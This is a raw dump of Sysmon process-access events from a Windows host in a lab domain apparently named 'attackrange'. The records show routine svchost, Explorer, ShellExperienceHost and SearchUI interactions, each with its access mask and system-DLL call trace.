System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845676C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+37bbe|C:\Windows\System32\wpncore.dll+232a3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-93FA-6005-FC04-00000000A301}37845676C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\wpncore.dll+38f2d|C:\Windows\System32\wpncore.dll+38e70|C:\Windows\System32\wpncore.dll+23267|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 10341000x800000000000000013151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.226{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:37.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:37.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\Sy
stem32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000013205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000013204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37845228C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-93FA-6005-FC04-00000000A301}37845228C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.211{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:38.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 